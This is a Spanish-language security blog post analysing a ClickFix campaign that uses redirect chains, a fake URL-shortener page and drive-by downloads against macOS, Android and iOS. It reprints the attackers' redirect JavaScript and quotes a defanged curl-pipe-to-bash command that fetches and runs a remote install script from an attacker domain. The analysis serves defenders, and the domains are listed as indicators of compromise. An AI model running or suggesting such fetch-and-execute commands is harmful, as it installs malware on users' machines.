Skip to main content
Blog
Attacks Blog

Ataques despiadados del lado del cliente dirigidos a múltiples plataformas con ClickFix

En este artículo, desglosamos una variante reciente de ClickFix que ahora apunta a macOS, Android e iOS, utilizando redirecciones basadas en navegador, mensajes de interfaz de usuario falsos e incluso técnicas de descarga no autorizada.

May 28, 2025 Actualizado Jul 20, 2026 6 min read
Imagen de portada del ataque ClickFix
Tabla de Contenidos

Resumen: cadena ClickFix con acortador cutt.ly atacando macOS, Android e iOS con un tarball drive-by

  • No solo Windows: ClickFix quedó archivado como simples prompts de PowerShell en Windows, y se olvidó. Ese modelo mental es precisamente la razón por la que la misma cadena de ingeniería social funciona ahora en terminales de macOS, descargas drive-by en Android y archivos tar protegidos con contraseña en iOS.
  • La cadena de ataque: La cadena empezaba con idjhvn4m[.]pro cargando un JavaScript inusualmente limpio, redirigía a través de kbmljxm[.]com y un acortador cutt.ly legítimo, y después soltaba un script de shell para macOS desde vuwzer[.]com detectado por 10 motores, y una carga útil móvil de iteslawow[.]com detectada por 5 motores en VirusTotal. cside captura el script real que recibe cada usuario y utiliza detección asistida por LLM para señalar flujos de descarga dirigidos a sistemas operativos específicos.
  • Revisa la suposición: Si tu equipo de endpoint descartó ClickFix como un problema exclusivo de Windows, revisa esa suposición esta semana. Los atacantes se han movido a multiplataforma, y los escáneres estáticos siguen recibiendo contenido limpio porque no pueden ver la cadena de redirección que ve el visitante.

¿Poco tiempo? Consulta el bloqueo de Magecart y skimmers en el navegador de cside. Cubre todo lo de abajo en un solo despliegue.

Lo que comenzó como un truco de ingeniería social centrado en Windows se ha convertido en una amenaza multiplataforma del lado del cliente. En este artículo, desglosamos una variante reciente de ClickFix que ahora apunta a macOS, Android e iOS, utilizando redirecciones basadas en navegador, mensajes de interfaz de usuario falsos y técnicas de descarga no autorizada.

¿Qué es un ataque ClickFix?

Los ataques ClickFix no son nuevos. Mi primer encuentro con uno fue en septiembre de 2024:

Tuit que documenta un ataque ClickFix temprano detectado en septiembre de 2024
Tuit

Un ataque ClickFix es una forma de ingeniería social dirigida o un ataque del lado del cliente que explota el instinto del usuario de "simplemente arreglar el problema". Normalmente empieza con un mensaje convincente que señala un supuesto problema (como una vulnerabilidad de seguridad o un problema de repositorio). Se insta al usuario a hacer clic en un enlace o ejecutar un comando, creyendo que está resolviendo algo importante.

En este ejemplo de ataque, se pide al usuario que ejecute un script en la terminal. En Windows, eso significaba PowerShell. La misma técnica también funciona en macOS y Linux. Y al igual que con Windows, asumí que los usuarios no caerían en la trampa.

Sin embargo, las suposiciones son un juego peligroso en ciberseguridad, algo que lamentablemente se demostró una vez más.

Somos cside, y monitorizamos ataques de scripts de terceros del lado del cliente y mejoramos la protección en tiempo real del lado del cliente para sitios web y sus usuarios. Solo en los últimos tres meses, hemos observado más de 300K sitios web comprometidos.

Esta es la segunda vez que damos a conocer que los atacantes han hecho evolucionar sus TTP (Tácticas, Técnicas y Procedimientos).

Pero lo que antes era una amenaza exclusiva de Windows, ahora también apunta a otros sistemas operativos.

El ataque en detalle

Recibimos una alerta para un JavaScript descargado de:

hxxps://idjhvn4m[.]pro?h=7bd350a4ed55a8faf2e45301d70d2&user=16

El script entregado:

(function () { var sitename = document.querySelector("meta[property='og:url']").getAttribute("content"); const mysite = new URL(sitename);const mysitename = `${mysite.protocol}//${mysite.hostname}`;var mytitle = document.querySelector("meta[property='og:title']").getAttribute("content"); var xtitle_spe = mytitle.replace(/[&\/\\#, +()$~%.'":*?<>{}]/g, '-'); var xtitle_spa = xtitle_spe.replace(/\s+/g, '-'); var oldurl = 'https://kbmljxm.com/?s={KEYWORD}&p=16'; var final_url_1 = oldurl.replace('{KEYWORD}', xtitle_spa);var final_url_2 = final_url_1.replace('{site}', mysitename); var id = 16; var successResponse = final_url_2; var elements = document.getElementsByClassName("buttonPress-"+16); for(var i = 0; i < elements.length; i++) {var anchor = elements[i];anchor.onclick = function() {window.open(successResponse, '_blank');}} })();

Este JavaScript no está muy ofuscado, algo poco común en este tipo de ataques. Crea un controlador de clic para elementos con un nombre de clase específico que abre una URL en una pestaña nueva al hacer clic. Esto es lo que hace:

  • Toma una URL de plantilla (hxxps://kbmljxm[.]com/?s={KEYWORD}&p=16)
  • Reemplaza {KEYWORD} con el título de página procesado
  • Añade controladores de clic a todos los elementos con la clase buttonPress-16
  • Al hacer clic, estos elementos abren la URL construida en una pestaña nueva

A continuación se muestra la cadena de redirección:

Pestaña de red del navegador que muestra la solicitud en la cadena de redirección
Pestaña de red que muestra la solicitud
Código JavaScript que construye la URL de redirección maliciosa y los controladores de clic
Código JavaScript

Cadena de redirección en la interfaz de usuario

La página parece un acortador de URL y le pide al usuario que copie un enlace. Los atacantes están abusando de cutt[.]ly, un acortador de URL legítimo.

Cuando un usuario pega la URL acortada en el navegador, se le redirige a:

Página falsa de acortador de URL que abusa de cutt.ly, mostrada al usuario en la cadena de redirección

Esta página de acortador de URL imitada muestra la siguiente ventana emergente:

"Pega el enlace que copiaste en la línea de dirección del navegador."

Ventana emergente que indica al usuario que pegue el enlace copiado en la barra de direcciones del navegador
"Pega el enlace que copiaste en la línea de dirección del navegador."

Luego redirige al usuario a una página de descarga (en este caso, para macOS):

Página de descarga falsa de macOS a la que se redirige al usuario
Luego redirige al usuario a una página de descarga (en este caso, para macOS):
/bin/bash -c "$(curl -fsSL hxxps://vuwzer[.]com/get/install.sh)"

El contenido de este archivo shell es el siguiente, según esta captura de pantalla:

Contenido del script de shell malicioso install.sh

Este script de shell luego descarga un ejecutable de macOS (detectado por 10 motores antivirus en VirusTotal).

Resultado de VirusTotal que muestra el ejecutable de macOS marcado por 10 motores antivirus

Comportamiento en Android e iOS

Cuando probamos esto en Android e iOS, esperábamos una variante de ClickFix. En cambio, nos encontramos con un ataque drive-by.

Un ataque drive-by es un tipo de ciberataque en el que se ejecuta o descarga código malicioso en un dispositivo simplemente al visitar una página web comprometida o maliciosa. No se requieren clics, instalaciones ni ningún tipo de interacción.

La página ahora nos redirigió a:

hxxps://iteslawow[.]com/?=ijn&diu=16&sid=npT
Página 'El archivo está listo para descargar' mostrada en el navegador móvil durante el ataque drive-by
"El archivo está listo para descargar" en el navegador móvil

Este sitio descargó un archivo .tar (protegido con contraseña mediante 7zip) que, al extraerse, soltaba el malware (detectado por 5 motores antivirus). También fue detectado por 5 proveedores en VirusTotal.

Fue detectado por 5 proveedores en VirusTotal.

Resultado de VirusTotal que muestra el malware móvil detectado por 5 proveedores
Puntuación de VirusTotal de 5

Tanto en el sistema operativo Android como en Windows, se utilizó este estilo de ataque drive-by.

Este ataque muestra hasta qué punto los atacantes están ampliando su alcance. Lo que comenzó como una campaña ClickFix específica de Windows ahora apunta a macOS, Android e iOS, ampliando significativamente la escala de la operación.

Es otro recordatorio de lo ampliamente que se están extendiendo los ataques del lado del cliente, y de las muchas formas que pueden adoptar, todo ello aprovechando la confianza que los usuarios depositan en las interacciones del navegador cuando la seguridad del lado del cliente es deficiente o se aplica mal.

Himanshu Anand
Software Engineer

I'm a software engineer and security analyst.

FAQ

Frequently Asked Questions

Un ataque ClickFix es una técnica de ingeniería social que aprovecha el instinto del usuario de "simplemente arreglar el problema". El atacante muestra un error o alerta falsos (aviso de seguridad, problema de repositorio, mensaje del sistema) y le indica al usuario que ejecute un comando en la terminal, pegue código en la consola del navegador o haga clic en un enlace malicioso. El usuario cree que está resolviendo un problema, pero en realidad está ejecutando la carga útil del atacante.

Sí. ClickFix comenzó en Windows con instrucciones de PowerShell, pero cside ha observado campañas activas que apuntan a macOS (descargando scripts shell que obtienen ejecutables de macOS), Android e iOS (descargas drive-by con archivos .tar protegidos por contraseña). La variante multiplataforma se basa en redirecciones en el navegador y prompts de interfaz de usuario falsos en lugar de herramientas específicas del sistema operativo.

La campaña analizada en este artículo usó `idjhvn4m[.]pro` como host inicial de entrega de JavaScript, `kbmljxm[.]com` como intermediario de redirección e `iteslawow[.]com` para la carga drive-by en Android e iOS. Las cargas útiles de la etapa final fueron marcadas por 5-10 motores antivirus en VirusTotal. Los defensores deben tratar estos dominios como IOC y revisar los registros de salida para detectar coincidencias.

Se requiere monitoreo en tiempo de ejecución del lado del cliente. El comportamiento malicioso ocurre después de que se carga la página, a menudo solo para un subconjunto de visitantes según la geografía, el dispositivo o el referente. Los escáneres estáticos pasan por alto estas cargas porque los atacantes detectan los escáneres y sirven contenido limpio. cside captura el script real que recibe cada usuario y utiliza detección asistida por LLM para señalar redirecciones, prompts falsos y flujos de descarga dirigidos al sistema operativo.

Es una evolución directa. El encuentro de septiembre de 2024 vinculado en el artículo documentó la primera variante en Windows. La campaña descrita aquí reutiliza el mismo patrón de ingeniería social, pero amplía la lista de sistemas operativos objetivo y cambia de un flujo de ejecución exclusivo de Windows a un mecanismo de entrega multiplataforma con nueva infraestructura.

Monitoriza y protege tus scripts de terceros

Gain full visibility and control over every script delivered to your users to enhance site security and performance.

Empieza gratis o prueba Business con una versión de prueba de 14 días.

Interfaz del panel de cside que muestra la monitorización de scripts y el análisis de seguridad
Related Articles
Reservar una demo

¿Quieres verlo en detalle con un ingeniero?

Treinta minutos, sobre tu propio sitio. Nada de diapositivas.

Reserva una demo personalizada para ver:

Cómo cumplir los requisitos 6.4.3 y 11.6.1 de PCI DSS en 1 día
Por qué los scripts de terceros son un riesgo de seguridad para ti y tus visitantes
Cómo monitorizar fugas de privacidad y consentimiento (RGPD, CCPA) en cada tercero
Cómo frenar el abuso de registros, el uso compartido de cuentas y el fraude de contracargos con device intelligence
Cómo detectar y controlar agentes de IA y bots que llegan a tu sitio en tiempo real

¿Prefieres mandarnos una pregunta?

Buscando huecos libres…

Solo humanos de verdad. Nos daríamos cuenta.

¿Problemas para reservar? Abrir el calendario en una pestaña nueva

¿Qué quieres resolver?

Cuéntanoslo en una línea y te responderemos con algo útil, no con un discurso genérico.

Solemos ayudar con:

Ver qué scripts de terceros se ejecutan en tu sitio
Evidencias para PCI DSS 6.4.3 y 11.6.1
Bots, agentes de IA y robo de cuentas

¿Prefieres reservar una hora? Elegir un hueco